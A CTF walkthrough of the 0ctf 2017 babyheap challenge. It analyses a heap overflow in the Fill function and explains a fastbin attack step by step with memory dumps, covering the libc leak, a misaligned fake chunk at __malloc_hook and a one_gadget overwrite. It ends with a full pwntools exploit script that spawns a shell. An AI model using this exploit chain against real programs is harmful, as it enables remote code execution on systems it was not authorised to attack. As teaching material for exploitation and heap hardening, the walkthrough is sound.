Heap exploitation example: 2017 0ctf babyheap

If there is no input for a while, the program prints "Alarm clock"; this comes from sub_B70 (which calls alarm; NOP it out).

[Figure 1]

There are five menu options in total.

Allocate: indices 0-15 can be allocated, 16 chunks in total; the size is not fixed but may not exceed 4096. Starting from a designated memory region, the program walks the region three qwords at a time and checks whether the flag is 0 (meaning that index is still unused); if so, it records the chunk's data there, otherwise it moves on by another three qwords.

Memory is allocated with calloc. calloc zeroes the newly allocated memory after allocating it, whereas malloc leaves it uninitialized, so its contents are leftover garbage.

After allocation, flag is set to 1 and the size and address are recorded. For example, flag, size and address are stored in that order:

000019E2F87FF280  01 00 00 00 00 00 00 00  00 01 00 00 00 00 00 00
000019E2F87FF290  10 90 C7 AB 09 56 00 00  01 00 00 00 00 00 00 00
000019E2F87FF2A0  20 00 00 00 00 00 00 00  20 91 C7 AB 09 56 00 00

Fill: takes an index and, before filling in any data, checks that the flag is 1; only then does it continue. It then reads a length and the content. (The input length is never compared with the allocated chunk size, so the content can overrun the chunk.)

sub_11B2(0x00005609ABC79120, 6)
{
    read(0, 0x00005609ABC79120, 6);
}

Dump: first checks that the corresponding flag is 1.

sub_130F(0x00005609ABC79120, 0x20)  // at most the whole chunk is printed; it never reads past the boundary
{
    write(1, 0x00005609ABC79120, 0x20);
}

Delete: checks whether the flag is 1; if so, it frees the address and then zeroes the flag, size and address stored in the array.

sub_B70: derives an address from /dev/urandom and uses it as the start of the array that holds each chunk's bookkeeping information.

Summary: every operation first checks that the flag is 1, so a UAF is out of the question. Delete has no problems either; only Fill fails to check the input length against the chunk length, which gives a heap overflow.
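To make the missing check concrete, here is an added C model (not code from the challenge binary) of the bookkeeping table described above, with a Fill handler that behaves as the page describes beside a hardened one that bounds the copy by the recorded size. The names struct slot, do_allocate, fill_unchecked, fill_checked and do_delete, and the sample input in demo(), are this example's own assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not code from the challenge binary: a model of babyheap's
 * bookkeeping table (flag, size, address per index) with the Fill handler as
 * the page describes it and a hardened Fill that adds the missing bound.
 * Names (struct slot, do_allocate, fill_unchecked, fill_checked, do_delete)
 * and the sample input in demo() are this example's own assumptions. */

#define MAX_SLOTS 16
#define MAX_SIZE  4096

struct slot {          /* one 3-qword entry of the table */
    uint64_t in_use;   /* flag: 1 while the index holds a live chunk */
    uint64_t size;     /* size passed to calloc */
    uint8_t *addr;     /* pointer returned by calloc */
};

static struct slot table[MAX_SLOTS];

/* Allocate: the first index whose flag is 0 receives (1, size, calloc(1, size)).
 * Returns the index, or -1 when the size is invalid or the table is full. */
int do_allocate(uint64_t size) {
    if (size == 0 || size > MAX_SIZE) return -1;
    for (int i = 0; i < MAX_SLOTS; i++) {
        if (table[i].in_use == 0) {
            uint8_t *p = calloc(1, size);   /* calloc: contents start zeroed */
            if (p == NULL) return -1;
            table[i].in_use = 1;
            table[i].size = size;
            table[i].addr = p;
            return i;
        }
    }
    return -1;
}

/* Fill as the binary implements it: the flag is checked, the length is not.
 * The copy is bounded only by the caller's len, so len > size runs past the
 * chunk into the next chunk's header (the overflow the page relies on).
 * Returns the number of bytes written, or -1 if the index is not live. */
int fill_unchecked(int idx, const uint8_t *data, size_t len) {
    if (idx < 0 || idx >= MAX_SLOTS || table[idx].in_use != 1) return -1;
    memcpy(table[idx].addr, data, len);   /* no bound against table[idx].size */
    return (int)len;
}

/* Hardened Fill: the same flag check plus the bound against the recorded size.
 * Oversized input is rejected rather than truncated so the caller sees the
 * error instead of silently losing data. */
int fill_checked(int idx, const uint8_t *data, size_t len) {
    if (idx < 0 || idx >= MAX_SLOTS || table[idx].in_use != 1) return -1;
    if (len > table[idx].size) return -1;  /* the check Fill is missing */
    memcpy(table[idx].addr, data, len);
    return (int)len;
}

/* Delete: free the chunk and zero the whole entry (flag, size, address). */
int do_delete(int idx) {
    if (idx < 0 || idx >= MAX_SLOTS || table[idx].in_use != 1) return -1;
    free(table[idx].addr);
    memset(&table[idx], 0, sizeof table[idx]);
    return 0;
}

/* Demonstration: the shape of the page's step 2, a 0x48-byte chunk followed by
 * a 0x49-byte fill. With fill_unchecked the 0x49th byte would land in the next
 * chunk's size field; fill_checked refuses the whole request. Returns 1 when
 * the hardened handler behaves as intended. */
int demo(void) {
    uint8_t payload[0x49];                 /* constructed input */
    memset(payload, 0, sizeof payload);
    payload[0x48] = 0xa1;                  /* the byte that would overwrite the next size field */
    int a = do_allocate(0x48);
    int b = do_allocate(0x40);
    int rejected = fill_checked(a, payload, sizeof payload);  /* -1: 0x49 > 0x48 */
    int accepted = fill_checked(a, payload, 0x48);            /* 0x48: fits exactly */
    do_delete(b);
    do_delete(a);
    return rejected == -1 && accepted == 0x48;
}

int main(void) {
    printf("hardened Fill behaves as intended: %d\n", demo());
    return 0;
}
```

The only difference between the two handlers is the single comparison against the size recorded at allocation time; since the table already stores that size next to the flag, the fix costs nothing beyond consulting it.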

Check the binary's protections with checksec:

[Figure 2]

All protections are enabled.

Exploit approach:

1. First leak the libc base. The fd and bk of a chunk in the unsorted bin point to main_arena+88, from which the libc base can be computed.

2. With the libc base in hand, use the heap overflow in Fill to modify a chunk's fd and get a chunk allocated at a position just before malloc_hook, then modify the value of malloc_hook.

3. Write one_gadget into malloc_hook and trigger it. This time the GOT cannot be modified as before, because Full RELRO is enabled. A so-called one_gadget is a code springboard that directly executes system('/bin/sh'). Commonly it is used to overwrite a GOT entry, a return address, or a hook (__malloc_hook, __free_hook); it is the shortcut for what to overwrite once control flow can be hijacked.

The concrete process follows. I have tried to include a detailed screenshot of every step, so that beginners like me can see the flow clearly.

1. First create four chunks (the annotations give the low bytes of the returned user pointer and the chunk's size field)

allocate(0x48)  # 0  a010 51
allocate(0x40)  # 1  a060 51
allocate(0x40)  # 2  a0b0 51
allocate(0x40)  # 3  a100 51

The array storing each chunk's information:

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00


2. Overwrite chunk1's header so that chunk1's size field becomes 0xA1

update(0, 0x49, '\x00'*0x48 + '\xa1')

Before:

000055C71CE7A000  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A050  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00

After:

000055C71CE7A000  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00


3. Delete chunk1 so that it goes into the unsorted bin

delete(1)  a060  # chunk1 goes into the unsorted bin

Q: Why does it go into the unsorted bin?

A: If the chunk just freed is larger than max_fast=64B (chunk1's size has been changed to 0xA1 at this point), it is first placed in the unsorted bin (there is only one, bins[1]). On the next allocation, if the request cannot be served from the fastbins, this bin is searched first.

Before delete:

000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00
000055C71CE7A060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

After delete:

000055C71CE7A050  00 00 00 00 00 00 00 00  A1 00 00 00 00 00 00 00
000055C71CE7A060  B8 B7 EE 38 0A 7F 00 00  B8 B7 EE 38 0A 7F 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


4. Request a chunk of size 0x40 so that the unsorted bin moves on to chunk2

allocate(0x40)  a060  # chunk2 is in the unsorted bin but its flag==1

Q: How did the unsorted bin go from chunk1 to chunk2?

A: If the unsorted bin holds exactly one chunk and the requested nb is smaller than that chunk, malloc carves off a piece of exactly nb from it for the user and leaves the remainder in the unsorted bin, with its fd and bk both set to the unsorted bin's address.

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00

000055C71CE7A050  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  B8 B7 EE 38 0A 7F 00 00  B8 B7 EE 38 0A 7F 00 00
000055C71CE7A0C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00

5. Leak the libc base by dumping the unsorted-bin chunk

view(2)  a0b0

main_arena+88 = 0x7F0A38EEB7B8

libc_base = 0x7F0A38EEB7B8 - 88 - 0x3c2760 = 0x7F0A38B29000

Note: 0x3c2760 was determined by looking at the malloc_trim function in libc.so. The value differs for every libc version and has to be worked out for the specific build. 0x3c2760 was determined in my debugging environment, Ubuntu 14.04 64-bit with libc-2.19.so; for the libc.so.6 shipped with the challenge it should be 0x3c4b20.

6. Create chunk4

allocate(0x40)  a0b0  # 4: takes the unsorted-bin chunk, the same place as chunk2

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  00 00 00 00 00 00 00 00

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A0E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


7. Overwrite chunk4

update(4, 0x40, 'a'*0x40)  a0b0

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0C0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0D0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0E0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


8. Overwrite chunk2, which is the same memory as chunk4

update(2, 0x10, 'b'*0x10)  a0b0

000055C71CE7A0A0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A0B0  62 62 62 62 62 62 62 62  62 62 62 62 62 62 62 62
000055C71CE7A0C0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0D0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0E0  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


9. Create chunk5

allocate(0x60)  # 5  a150

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00

000055C71CE7A140  00 00 00 00 00 00 00 00  71 00 00 00 00 00 00 00
000055C71CE7A150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A1A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


10. Delete chunk5 so that the fastbin points to chunk5

delete(5)  a150  # after the delete, fastbins = chunk5

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  00 00 00 00 00 00 00 00
000024B519199E90  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


11. Pick a suitable address as fake_chunk and overwrite chunk3's fd so that it points to fake_chunk

fake_chunk = leak_addr - 88 - 0x2b - 8 = 0x7F0A38EEB7B8 - 88 - 0x2b - 8 = 0x7F0A38EEB72D

payload = 'a'*0x40 + p64(0) + p64(0x70) + p64(fake_chunk)

update(3, len(payload), payload)  a100

Q: Why choose 7F0A38EEB72D as fake_chunk? In a fastbin attack the fd being overwritten has to satisfy conditions; it cannot be chosen arbitrarily.

A: Because 0x7F0A38EEB72D+8 is where the fake chunk's size field sits, and the value at that address happens to be 0x7f. We need to search upward from malloc_hook for a place where a valid size field can be carved out of misaligned bytes. When the fastbin index is computed, 0x7f belongs to index 5, i.e. a chunk size of 0x70.

Q: Why does it have to be a 0x70 chunk?

A: Because the earlier delete(5) put chunk5 into the 0x70 fastbin. So we need to find a size matching that bin (0x70) above malloc_hook. That lets the fastbin's fd pointer link chunk5 and fake_chunk together in the singly linked list.

Byte misalignment: this technique uses misaligned bytes to extract a size value that satisfies the check, so that a chunk can be allocated at that location. It is mostly used when the GOT cannot be modified.

Here you can see that, within the 8 bytes starting at 0x7fd7a4da9af5, a 7f can be picked out; treated as a size it counts as 0x70, which is within the size range of our fastbin. So 0x7fd7a4da9af5-8 is used as the start of fake_chunk and written over some chunk's fd.

Principle: malloc only checks whether the size field of the chunk that fd points to belongs to that fastbin. So as long as there is a size belonging to that fastbin near the address we want to write to, malloc can be made to return that location.

So pick a suitable address A: the chunk start is then A-8 (prev_size), the user data (which shares its storage with the fd pointer) starts at A+8, and the previous chunk's fd points to A-8.

The constructed size minus 0x10 is the malloc argument, i.e. the size of the user data returned.
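The size check the two answers above rely on is small enough to write out. The following added C example (not the page's code and not glibc's source) restates the size arithmetic 64-bit glibc of the 2.19/2.23 era applies when it serves a request from a fastbin, so the claim that a 0x7f byte passes as a 0x70 chunk can be verified; the constants are glibc's 64-bit values and the function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example; not code from the page and not glibc's source, but a
 * re-statement of the size arithmetic 64-bit glibc (2.19/2.23 era) applies
 * when it serves a request from a fastbin, so the page's "0x7f counts as a
 * 0x70 chunk" reasoning can be checked. Constants are glibc's 64-bit values
 * (SIZE_SZ 8, MALLOC_ALIGNMENT 16); the function names are this example's. */

#define SIZE_SZ        8ULL
#define MALLOC_ALIGN   16ULL
#define MIN_CHUNK_SIZE 32ULL
#define SIZE_BITS      7ULL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */

/* request2size: user request -> chunk size (8-byte header, rounded up to 16). */
uint64_t request2size(uint64_t req) {
    uint64_t raw = req + SIZE_SZ + MALLOC_ALIGN - 1;
    if (raw < MIN_CHUNK_SIZE) return MIN_CHUNK_SIZE;
    return raw & ~(MALLOC_ALIGN - 1);
}

/* chunksize: strip the three flag bits from a raw size field. */
uint64_t chunksize(uint64_t size_field) {
    return size_field & ~SIZE_BITS;
}

/* fastbin_index: (size >> 4) - 2 on 64-bit, so 0x20 -> 0, 0x30 -> 1, ..., 0x70 -> 5. */
unsigned fastbin_index(uint64_t chunk_size) {
    return ((unsigned)chunk_size >> 4) - 2;
}

/* The one sanity check _int_malloc applies to a chunk popped from a fastbin:
 * fastbin_index(chunksize(victim)) must equal the index of the bin being
 * served ("malloc(): memory corruption (fast)" otherwise). Nothing verifies
 * that the chunk lies inside the heap, which is why a misaligned byte such as
 * the page's 0x7f satisfies it. Returns 1 if victim_size_field is accepted
 * for a request of req bytes. */
int fastbin_size_accepted(uint64_t req, uint64_t victim_size_field) {
    unsigned idx = fastbin_index(request2size(req));
    return fastbin_index(chunksize(victim_size_field)) == idx;
}

int main(void) {
    /* constructed cases: the page's request (0x60) against several size fields */
    uint64_t fields[] = { 0x70, 0x7f, 0x71, 0x60, 0x7ff, 0x51 };
    for (size_t i = 0; i < sizeof fields / sizeof fields[0]; i++)
        printf("request 0x60, size field 0x%llx: %s\n",
               (unsigned long long)fields[i],
               fastbin_size_accepted(0x60, fields[i]) ? "accepted" : "rejected");
    return 0;
}
```

request2size(0x60) is 0x70, index 5; chunksize(0x7f) is 0x78, also index 5, so the check passes, whereas 0x60 (index 4) or 0x7ff (index 125) would abort malloc. The same arithmetic explains the earlier dumps: allocate(0x48) and allocate(0x40) both round to a 0x50 chunk, which is why their size fields read 0x51.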

[Figure 3]

After the overwrite, fd points to 7F0A38EEB72D:

000055C71CE7A0F0  00 00 00 00 00 00 00 00  51 00 00 00 00 00 00 00
000055C71CE7A100  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A110  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A120  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A130  61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61
000055C71CE7A140  00 00 00 00 00 00 00 00  70 00 00 00 00 00 00 00
000055C71CE7A150  2D B7 EE 38 0A 7F 00 00  00 00 00 00 00 00 00 00


12. Create a chunk; it is allocated at the address of the previously deleted chunk5

allocate(0x60)  a150  # 5

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00

000055C71CE7A140  00 00 00 00 00 00 00 00  70 00 00 00 00 00 00 00
000055C71CE7A150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A190  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000055C71CE7A1A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00


13. Create chunk6; it is allocated at the fake_chunk forged earlier: fake_chunk+0x10 = 00007F0A38EEB73D

allocate(0x60)  # 6  fake_chunk

000024B519199E10  01 00 00 00 00 00 00 00  48 00 00 00 00 00 00 00
000024B519199E20  10 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E30  40 00 00 00 00 00 00 00  60 A0 E7 1C C7 55 00 00
000024B519199E40  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E50  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E60  40 00 00 00 00 00 00 00  00 A1 E7 1C C7 55 00 00
000024B519199E70  01 00 00 00 00 00 00 00  40 00 00 00 00 00 00 00
000024B519199E80  B0 A0 E7 1C C7 55 00 00  01 00 00 00 00 00 00 00
000024B519199E90  60 00 00 00 00 00 00 00  50 A1 E7 1C C7 55 00 00
000024B519199EA0  01 00 00 00 00 00 00 00  60 00 00 00 00 00 00 00
000024B519199EB0  3D B7 EE 38 0A 7F 00 00  00 00 00 00 00 00 00 00


14. Overwrite chunk6 so that __malloc_hook ends up holding the one_gadget address

update(6, 0x3+8, 'c'*0x3 + p64(one_gadget))  // after the write, __malloc_hook holds the one_gadget address

00007F0A38EEB73D lies 3 bytes before __malloc_hook:

libc_2.19.so:00007F0A38EEB73D db    0
libc_2.19.so:00007F0A38EEB73E db    0
libc_2.19.so:00007F0A38EEB73F db    0
libc_2.19.so:00007F0A38EEB740 __malloc_hook db    0
libc_2.19.so:00007F0A38EEB741 db    0
libc_2.19.so:00007F0A38EEB742 db    0
libc_2.19.so:00007F0A38EEB743 db    0
libc_2.19.so:00007F0A38EEB744 db    0
libc_2.19.so:00007F0A38EEB745 db    0

Running one_gadget lists four usable addresses. Here we pick 0x4647c.

[Figure 4]

one_gadget = libc_base + 0x4647c = 0x7F0A38B29000 + 0x4647c = 7F0A38B6F47C

After the write, __malloc_hook holds the one_gadget address 7F0A38B6F47C:

00007F0A38EEB730  60 CF BA 38 0A 7F 00 00  00 00 00 00 00 63 63 63
00007F0A38EEB740  7C F4 B6 38 0A 7F 00 00  00 00 00 00 00 00 00 00

[Figure 5]
[Figure 6]

15. When calloc is called, the function address stored in malloc_hook, 7F0A38B6F47C, is invoked, which executes execve("/bin/sh", rsp+0x30, environ)

alloc(10)


Full exploit

from pwn import *

context.log_level = 'debug'

cn = process('./babyheap')
elf = ELF('./babyheap')
libc = ELF('./libc.so.6')

sl   = lambda data        : cn.sendline(str(data))
r    = lambda numb=4096   : cn.recv(numb)
ru   = lambda delims      : cn.recvuntil(delims)
irt  = lambda             : cn.interactive()
uu64 = lambda data        : u64(data.ljust(8, '\0'))


def allocate(size):
    ru('Command: ')
    sl(1)
    ru('Size: ')
    sl(size)


def update(index, size, content):
    ru('Command: ')
    sl(2)
    ru('Index: ')
    sl(index)
    ru('Size: ')
    sl(size)
    ru('Content: ')
    sl(content)


def delete(index):
    ru('Command: ')
    sl(3)
    ru('Index: ')
    sl(index)


def view(index):
    ru('Command: ')
    sl(4)
    ru('Index: ')
    sl(index)


allocate(0x48)  # 0
allocate(0x40)  # 1
allocate(0x40)  # 2
allocate(0x40)  # 3

update(0, 0x49, '\x00'*0x48 + '\xa1')  # change chunk1's size
delete(1)  # chunk1 in unsorted bin
raw_input('delete chunk1')
gdb.attach(cn)
allocate(0x40)  # chunk2 in unsorted bin but flag==1
raw_input('create chunk1, chunk2 in unsorted bin')
gdb.attach(cn)
view(2)
ru('Content: \n')
leak_addr = uu64(r(6))
success('leak_addr:' + hex(leak_addr))
libc_base = leak_addr - 88 - 0x3c4b20
success('libc_base:' + hex(libc_base))
allocate(0x40)  # 4 clear unsorted bin, place 2
update(4, 0x40, 'a'*0x40)
update(2, 0x10, 'b'*0x10)
# trim malloc_hook
allocate(0x60)  # 5
delete(5)  # after delete, fastbins = chunk5
raw_input('delete chunk5')
gdb.attach(cn)
fake_chunk = leak_addr - 88 - 0x2b - 8
payload = 'a'*0x40 + p64(0) + p64(0x70) + p64(fake_chunk)
update(3, len(payload), payload)
allocate(0x60)  # 5 after created, fastbins changed to fake_chunk
raw_input('create chunk5')
gdb.attach(cn)
allocate(0x60)  # 6
one_gadget = libc_base + 0x4526a
success('one_gadget:' + hex(one_gadget))
update(6, 0x13+8, 'c'*0x13 + p64(one_gadget))
raw_input('update chunk6 to one_gadget')
allocate(0x10)
'''
one_gadget libc.so.6
0x45216
0x4526a
0xf02a4
0xf1147
'''
irt()


This post referenced the following article:

https://bbs.pediy.com/thread-247381.htm